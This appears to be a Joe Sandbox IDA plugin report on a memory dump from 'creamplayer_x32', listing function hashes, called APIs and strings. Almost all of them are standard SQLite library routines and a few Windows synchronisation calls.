                                                                                                    • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                                    • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                                                    • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                                    • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                                                    APIs
                                                                                                    • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                                    • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                                      • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                                    • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                                      • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                                    • sqlite3_step.SQLITE3 ref: 60969197
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                                    • String ID:
                                                                                                    • API String ID: 2877408194-0
                                                                                                    • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                                    • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                                                    • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                                    • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
                                                                                                    • String ID:
                                                                                                    • API String ID: 1163609955-0
                                                                                                    • Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                                    • Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
                                                                                                    • Opcode Fuzzy Hash: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                                    • Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
                                                                                                    APIs
                                                                                                    • sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                                                                    • sqlite3_step.SQLITE3 ref: 609615C9
                                                                                                    • sqlite3_column_int.SQLITE3 ref: 609615E1
                                                                                                      • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609615EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
                                                                                                    • String ID:
                                                                                                    • API String ID: 4265739436-0
                                                                                                    • Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                                    • Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
                                                                                                    • Opcode Fuzzy Hash: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                                    • Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 6092A638
                                                                                                      • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6092A64F
                                                                                                    • strcmp.MSVCRT ref: 6092A66A
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6092A67D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_mutex_leavestrcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1894734062-0
                                                                                                    • Opcode ID: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                                                                    • Instruction ID: 0dacd04717b96a229033e5bf385d74358d6efc238696297f04088f4a0acd15ee
                                                                                                    • Opcode Fuzzy Hash: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                                                                    • Instruction Fuzzy Hash: EBF0B4726243044BC7006F799CC164A7FAEEEB1298B05802CEC548B319EB35DC0297A1
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                                    • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                                                    • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                                    • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source (identical for every function record in this section)
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: into$out of
                                                                                                    • API String ID: 632333372-1114767565
                                                                                                    • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                                    • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                                                    • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                                    • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                                                    APIs
                                                                                                      • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                                                    • sqlite3_free.SQLITE3 ref: 609193A3
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_value_text
                                                                                                    • String ID: (NULL)$NULL
                                                                                                    • API String ID: 2175239460-873412390
                                                                                                    • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                                    • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                                                    • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                                    • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: -- $d
                                                                                                    • API String ID: 632333372-777087308
                                                                                                    • Opcode ID: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                                    • Instruction ID: d45f625f7ed72e8bd0cbe86fb5af212c953cff4c7e5ffbb26f6c4a79540968e1
                                                                                                    • Opcode Fuzzy Hash: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                                    • Instruction Fuzzy Hash: FB51F674A043689BDB26CF28C980789BBFABF55304F1481D9E89CAB341C7759E85CF40
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: string or blob too big$|
                                                                                                    • API String ID: 632333372-330586046
                                                                                                    • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                                    • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                                                    • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                                    • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: d$|
                                                                                                    • API String ID: 632333372-415524447
                                                                                                    • Opcode ID: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                                    • Instruction ID: dac03e427e93f591f5d1737f90c886445feec93ea56e6f6f32424ebbe55d5cce
                                                                                                    • Opcode Fuzzy Hash: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                                    • Instruction Fuzzy Hash: 50510970A04329DBDB26CF19C981799BBBABF55308F0481D9E958AB341D735EE81CF41
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_value_text
                                                                                                    • String ID: string or blob too big
                                                                                                    • API String ID: 2320820228-2803948771
                                                                                                    • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                                    • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                                                    • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                                    • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                                                    APIs
                                                                                                    • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                    • String ID:
                                                                                                    • API String ID: 3265351223-3916222277
                                                                                                    • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                                    • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                                                    • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                                    • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp
                                                                                                    • String ID: log
                                                                                                    • API String ID: 912767213-2403297477
                                                                                                    • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                                    • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                                    • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                                    • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_strnicmp
                                                                                                    • String ID: SQLITE_
                                                                                                    • API String ID: 1961171630-787686576
                                                                                                    • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                                    • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                                    • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                                    • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                                    APIs
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                                    • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                                    Strings
                                                                                                    • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                                    • String ID: Invalid argument to rtreedepth()
                                                                                                    • API String ID: 1063208240-2843521569
                                                                                                    • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                                    • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                                    • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                                    • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                                    APIs
                                                                                                    • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                                      • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                                      • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                                      • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                                      • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                                    • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: soft_heap_limit
                                                                                                    • API String ID: 1251656441-405162809
                                                                                                    • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                                    • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                                                    • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                                    • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                                    APIs
                                                                                                    • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                                    • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: NULL
                                                                                                    • API String ID: 632333372-324932091
                                                                                                    • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                                    • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                                                    • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                                    • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeavefree
                                                                                                    • String ID:
                                                                                                    • API String ID: 4020351045-0
                                                                                                    • Opcode ID: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                                                    • Instruction ID: 980a39aab3b848caec2c27f45d5308e77b440585e3cd6ccd446b63c63d51e1b6
                                                                                                    • Opcode Fuzzy Hash: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                                                    • Instruction Fuzzy Hash: 2D018070B293058BDB10DF28C985919BBFBABB6308B20855CE499D7355D770DC80EB62
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 682475483-0
                                                                                                    • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                                    • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                                                    • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                                    • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2